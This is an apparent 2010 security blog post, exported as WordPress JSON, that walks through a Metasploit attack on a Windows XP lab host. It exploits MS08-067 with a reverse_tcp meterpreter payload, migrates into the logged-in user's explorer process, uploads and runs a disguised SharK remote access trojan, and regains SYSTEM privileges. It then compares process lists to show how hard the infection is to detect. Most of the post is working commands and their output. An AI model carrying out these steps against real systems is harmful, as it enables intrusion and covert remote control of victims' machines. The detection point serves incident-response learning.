{"id":34,"date":"2010-03-25T16:57:00","date_gmt":"2010-03-25T16:57:00","guid":{"rendered":"https:\/\/freezion.com\/?p=34"},"modified":"2010-03-25T16:57:00","modified_gmt":"2010-03-25T16:57:00","slug":"even-when-you-know-youre-pwnd-its-hard-to-see","status":"publish","type":"post","link":"https:\/\/freezion.com\/?p=34","title":{"rendered":"Even When You Know You're Pwnd, It's Hard To See"},"content":{"rendered":"

I’m playing around with a RAT showdown for a project I’m working on (teaser: It will be a comparison of SharK 3.1, Poison Ivy 2.3.2, and the GPL version of Immunity Inc’s Hydrogen<\/a>).<\/p>\n

While doing this, it really hit home how tough it is to tell a host has been owned if it’s being done right.<\/p>\n

I know this anyway, having been on the incident response side of things for a number of years, so it’s not news really. It’s just that every now and then something springs back up from memory and smacks you clear across the face and screams “Oh Yeah!” in a Randy “Macho Man” Savage impression. This was one of those moments for me.<\/p>\n

Let me give an example. I’ll do that, by combining it with a “how to use the metasploit framework to upload binaries” overview first.<\/p>\n

So, step 1 is: get MSF3, and run the msfconsole. I’m going to skip that step here, and jump straight to setting the payload we want (meterpreter), and exploiting.<\/p>\n

First, set the payload:<\/p>\n

 msf > setg payload windows\/meterpreter\/reverse_tcp\npayload => windows\/meterpreter\/reverse_tcp<\/pre>\n
Now pick everyone’s favorite exploit: ms08_067_netapi<\/p>\n
 msf > use exploit\/windows\/smb\/ms08_067_netapi<\/pre>\n
Let’s take a look at the options:<\/p>\n
msf exploit(ms08_067_netapi) > show options\n\nModule options:\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST                     yes       The target address\n   RPORT    445              yes       Set the SMB service port\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique: seh, thread, process\n   LHOST     10.0.1.51        yes       The local address\n   LPORT     4444             yes       The local port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting<\/pre>\n
Some of these were set for me via my msfconsole.rc file (specifically, the LHOST setting for the payload.)
\nNow I pick the target I’ll be exploiting, and set it with the RHOST option:<\/p>\n
msf exploit(ms08_067_netapi) > set RHOST 10.0.1.71\nRHOST => 10.0.1.71<\/pre>\n
Once that’s all set, I can exploit the host:<\/p>\n
msf exploit(ms08_067_netapi) > exploit\n\n[*] Started reverse handler on 10.0.1.51:4444\n[*] Automatically detecting the target...\n[*] Fingerprint: Windows XP Service Pack 2 - lang:English\n[*] Selected Target: Windows XP SP2 English (NX)\n[*] Triggering the vulnerability...\n[*] Sending stage (748032 bytes)\n[*] Meterpreter session 1 opened (10.0.1.51:4444 -> 10.0.1.71:1082)<\/pre>\n
BAM! I have a meterpreter session (ms08_067 isn’t called ‘old faithful’ for nothing.)<\/p>\n
OK. Pentest done. Next B0x!<\/p>\n
Unfortunately, that’s too often the case. This is sad really, because there’s so much more I can do with this. Like the following \ud83d\ude09<\/p>\n
Let me start by finding out some information about the session, what privs I have on the host, and what process I’m running under:<\/p>\n
 meterpreter > getuid\nServer username: NT AUTHORITYSYSTEM\n\nmeterpreter > getpid\nCurrent pid: 1108\n\nmeterpreter > ps\n\nProcess list\n============\n\n PID   Name              Arch  Session  User                          Path\n ---   ----              ----  -------  ----                          ----\n 0     [System Process]\n 4     System            x86   0        NT AUTHORITYSYSTEM\n 632   smss.exe          x86   0        NT AUTHORITYSYSTEM           SystemRootSystem32smss.exe\n 680   csrss.exe         x86   0        NT AUTHORITYSYSTEM           ??C:WINDOWSsystem32csrss.exe\n 704   winlogon.exe      x86   0        NT AUTHORITYSYSTEM           ??C:WINDOWSsystem32winlogon.exe\n 748   services.exe      x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32services.exe\n 764   lsass.exe         x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32lsass.exe\n 940   svchost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32svchost.exe\n 988   svchost.exe       x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32svchost.exe\n 1108  svchost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSSystem32svchost.exe\n 1184  svchost.exe       x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32svchost.exe\n 1280  svchost.exe       x86   0        NT AUTHORITYLOCAL SERVICE    C:WINDOWSsystem32svchost.exe\n 1448  spoolsv.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32spoolsv.exe\n 1704  explorer.exe      x86   0        VIKTIM2viktim                C:WINDOWSExplorer.EXE\n 1860  msdtc.exe         x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32msdtc.exe\n 352   mqsvc.exe         x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32mqsvc.exe\n 832   mqtgsvc.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32mqtgsvc.exe\n 768   alg.exe           x86   0        NT AUTHORITYLOCAL SERVICE    C:WINDOWSSystem32alg.exe\n 4032  sqlservr.exe      x86   0        NT AUTHORITYNETWORK SERVICE  c:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLBinnsqlservr.exe\n 4052  inetinfo.exe      x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32inetsrvinetinfo.exe\n 4044  dllhost.exe       x86   0        VIKTIM2IWAM_VIKTIM2          C:WINDOWSsystem32dllhost.exe\n 3692  dllhost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32dllhost.exe\n 3896  IEXPLORE.EXE      x86   0        NT AUTHORITYSYSTEM           C:Program FilesInternet ExplorerIEXPLORE.EXE<\/pre>\n
Pretty cool. As expected, I’m running as the local system, and have attached to the svchost.exe process (pid# 1108).<\/p>\n
If I look at the current working directory for the session, I see it’s the Windows system32 directory:<\/p>\n
meterpreter > pwd\nC:WINDOWSsystem32<\/pre>\n
That’s all very cool, but for this example, I want to interact with a user session.
\nLooking at the process list, I see that there’s a ‘viktim’ user logged in and that user is running explorer.exe in process 1704.<\/p>\n
I’m going to try to switch to that process, using the handy migrate function provided by metasploit:<\/p>\n
meterpreter > migrate 1704\n[*] Migrating to 1704...\n[*] Migration completed successfully.\n\nmeterpreter > getuid\nServer username: VIKTIM2viktim<\/pre>\n
Excellent. I’ve now switched to a process running in the context of my target user.
\nLet me take a look at what my current directory is now:<\/p>\n
meterpreter > pwd\nC:Documents and Settingsviktim<\/pre>\n
What I want to do now is to upload my malware to the host.
\nIn this case, I’ll be uploading a remote access trojan I built using sharK.
\nI’ve named the executable msdce32.exe in a sad attempt to be sneaky \ud83d\ude09
\nTo upload the file to the victim host, I use the upload function in meterpreter:<\/p>\n
 meterpreter > upload msdce32.exe\n[*] uploading  : msdce32.exe -> msdce32.exe\n[*] uploaded   : msdce32.exe -> msdce32.exe<\/pre>\n
Looks like the file upload was successful, so I try running it using the execute command.
\nThis command takes a -f parameter with the filename to execute:<\/p>\n
meterpreter > execute -f msdce32.exe\nProcess 292 created.<\/pre>\n
Very nice. Looking at my sharK console, I see that the process worked, because my victim has now connected to my SIN and I am able to use sharK to interact with it. (That will be a different post entirely, but here’s a screenshot of what it looks like. Note that the XP Desktop in the image below is actually a screen capture of the victim host that sharK provides when you mouseover the connection in the SIN):<\/p>\n
\"\"<\/a><\/p>\n
Since I’m done exploiting my victim user, let me return back to the host and go back to a system process using the getsystem method in meterpreter:<\/p>\n
meterpreter > getsystem\n...got system (via technique 1).<\/pre>\n
Since I’m back at system, let me see if I can see my trojan running:<\/p>\n
meterpreter > ps\n\nProcess list\n============\n\n PID   Name              Arch  Session  User                          Path\n ---   ----              ----  -------  ----                          ----\n 0     [System Process]\n 4     System            x86   0        NT AUTHORITYSYSTEM\n 632   smss.exe          x86   0        NT AUTHORITYSYSTEM           SystemRootSystem32smss.exe\n 680   csrss.exe         x86   0        NT AUTHORITYSYSTEM           ??C:WINDOWSsystem32csrss.exe\n 704   winlogon.exe      x86   0        NT AUTHORITYSYSTEM           ??C:WINDOWSsystem32winlogon.exe\n 748   services.exe      x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32services.exe\n 764   lsass.exe         x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32lsass.exe\n 940   svchost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32svchost.exe\n 988   svchost.exe       x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32svchost.exe\n 1108  svchost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSSystem32svchost.exe\n 1184  svchost.exe       x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32svchost.exe\n 1280  svchost.exe       x86   0        NT AUTHORITYLOCAL SERVICE    C:WINDOWSsystem32svchost.exe\n 1448  spoolsv.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32spoolsv.exe\n 1704  explorer.exe      x86   0        VIKTIM2viktim                C:WINDOWSExplorer.EXE\n 1860  msdtc.exe         x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32msdtc.exe\n 352   mqsvc.exe         x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32mqsvc.exe\n 832   mqtgsvc.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32mqtgsvc.exe\n 768   alg.exe           x86   0        NT AUTHORITYLOCAL SERVICE    C:WINDOWSSystem32alg.exe\n 4032  sqlservr.exe      x86   0        NT AUTHORITYNETWORK SERVICE  c:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLBinnsqlservr.exe\n 4052  inetinfo.exe      x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32inetsrvinetinfo.exe\n 4044  dllhost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32dllhost.exe\n 3692  dllhost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32dllhost.exe\n 3896  IEXPLORE.EXE      x86   0        NT AUTHORITYSYSTEM           C:Program FilesInternet ExplorerIEXPLORE.EXE\n 2988  IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet ExplorerIEXPLORE.EXE\n 916   IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet ExplorerIEXPLORE.EXE\n 3448  IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet Exploreriexplore.exe<\/pre>\n
Hmm.. Nothing really stands out.
\nFor fun, I killed the server from the sharK SIN, and compare the process table without the RAT running:<\/p>\n
meterpreter > ps\n\nProcess list\n============\n\n PID   Name              Arch  Session  User                          Path\n ---   ----              ----  -------  ----                          ----\n 0     [System Process]\n 4     System            x86   0        NT AUTHORITYSYSTEM\n 632   smss.exe          x86   0        NT AUTHORITYSYSTEM           SystemRootSystem32smss.exe\n 680   csrss.exe         x86   0        NT AUTHORITYSYSTEM           ??C:WINDOWSsystem32csrss.exe\n 704   winlogon.exe      x86   0        NT AUTHORITYSYSTEM           ??C:WINDOWSsystem32winlogon.exe\n 748   services.exe      x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32services.exe\n 764   lsass.exe         x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32lsass.exe\n 940   svchost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32svchost.exe\n 988   svchost.exe       x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32svchost.exe\n 1108  svchost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSSystem32svchost.exe\n 1184  svchost.exe       x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32svchost.exe\n 1280  svchost.exe       x86   0        NT AUTHORITYLOCAL SERVICE    C:WINDOWSsystem32svchost.exe\n 1448  spoolsv.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32spoolsv.exe\n 1704  explorer.exe      x86   0        VIKTIM2viktim                C:WINDOWSExplorer.EXE\n 1860  msdtc.exe         x86   0        NT AUTHORITYNETWORK SERVICE  C:WINDOWSsystem32msdtc.exe\n 352   mqsvc.exe         x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32mqsvc.exe\n 832   mqtgsvc.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32mqtgsvc.exe\n 768   alg.exe           x86   0        NT AUTHORITYLOCAL SERVICE    C:WINDOWSSystem32alg.exe\n 4032  sqlservr.exe      x86   0        NT AUTHORITYNETWORK SERVICE  c:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLBinnsqlservr.exe\n 4052  inetinfo.exe      x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32inetsrvinetinfo.exe\n 4044  dllhost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32dllhost.exe\n 3692  dllhost.exe       x86   0        NT AUTHORITYSYSTEM           C:WINDOWSsystem32dllhost.exe\n 3896  IEXPLORE.EXE      x86   0        NT AUTHORITYSYSTEM           C:Program FilesInternet ExplorerIEXPLORE.EXE\n 2988  IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet ExplorerIEXPLORE.EXE\n 3364  IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet Exploreriexplore.exe<\/pre>\n
If you can’t see a difference between the ‘infected’ and ‘not infected’ states, it’s because there’s not much of one.
\nHere’s the output from running the ‘diff’ command on the process tables:<\/p>\n
 $ diff running notrunning\n32,33c32\n<  916   IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet ExplorerIEXPLORE.EXE\n<  3448  IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet Exploreriexplore.exe\n---\n>  3364  IEXPLORE.EXE      x86   0        VIKTIM2viktim                C:Program FilesInternet Exploreriexplore.exe<\/pre>\n
As you can see, it’s pretty tough to tell that this host is compromised just based on that.<\/p>\n
You could see that it was compromised in the network traffic perhaps, as the RAT communicates with its control center. However, if a standard port was being used for the comms (say, TCP\/80 for example) it could be difficult to tell even then without looking at the actual packets to examine the data.<\/p>\n
Like I said, this wasn’t really something I just figured out, it was just a very nice, clearly defined example of it.<\/p>\n","protected":false},"excerpt":{"rendered":"
I’m playing around with a RAT showdown for a project I’m working on (teaser: It will be a comparison…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[25,40,43,47],"class_list":["post-34","post","type-post","status-publish","format-standard","hentry","category-hacking","tag-ir","tag-msf","tag-pentest","tag-rat"],"_links":{"self":[{"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/posts\/34","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=34"}],"version-history":[{"count":0,"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/posts\/34\/revisions"}],"wp:attachment":[{"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=34"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=34"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}